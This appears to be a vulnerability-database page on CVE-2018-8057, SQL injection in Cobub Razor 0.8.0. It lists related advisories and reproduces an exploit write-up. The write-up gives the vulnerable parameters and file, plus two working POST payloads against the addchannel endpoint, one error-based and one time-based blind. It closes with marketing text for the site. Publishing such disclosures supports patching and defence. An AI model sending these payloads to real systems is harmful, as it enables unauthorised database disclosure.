| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| Cobub Razor 0.8.0 SQL Injection Vulnerability | 17 Apr 201800:00 | – | zdt | |
| Western Bridge Cobub Razor SQL Injection Vulnerability | 12 Mar 201800:00 | – | cnvd | |
| CVE-2018-8057 | 11 Mar 201818:00 | – | cve | |
| CVE-2018-8057 | 11 Mar 201818:00 | – | cvelist | |
| EUVD-2018-19739 | 7 Oct 202500:30 | – | euvd | |
| Cobub Razor 0.8.0 - SQL injection | 16 Apr 201800:00 | – | exploitpack | |
| CVE-2018-8057 | 11 Mar 201818:29 | – | nvd | |
| Cobub Razor 0.8.0 SQL Injection | 16 Apr 201800:00 | – | packetstorm | |
| Sql injection | 11 Mar 201818:29 | – | prion |
# Exploit Title: Cobub Razor 0.8.0 SQL injection Vulnerability
# Date: 2018-04-16
# Exploit Author: Kyhvedn([email protected]、[email protected])
# Vendor Homepage: http://www.cobub.com/
# Software Link: https://github.com/cobub/razor
# Version: 0.8.0
# CVE : CVE-2018-8057
The string of the 'channel_name' and 'platform' parameter transmission is completely without check and filter,so if the string is passed, it will lead to the existence of SQL injection vulnerability,This could result in full information disclosure.
Code source:
/application/controllers/manage/channel.php at line 75-95
The SQL injection type: error-based and AND/OR time-based blind
Parameter: channel_name,platform
PoC:
http://localhost/index.php?/manage/channel/addchannel
POST data:
1.channel_name=test" AND (SELECT 1700 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(1700=1700,1))),0x71786a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JQon&platform=1
2.channel_name=test" AND SLEEP(5)-- NklJ&platform=1Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation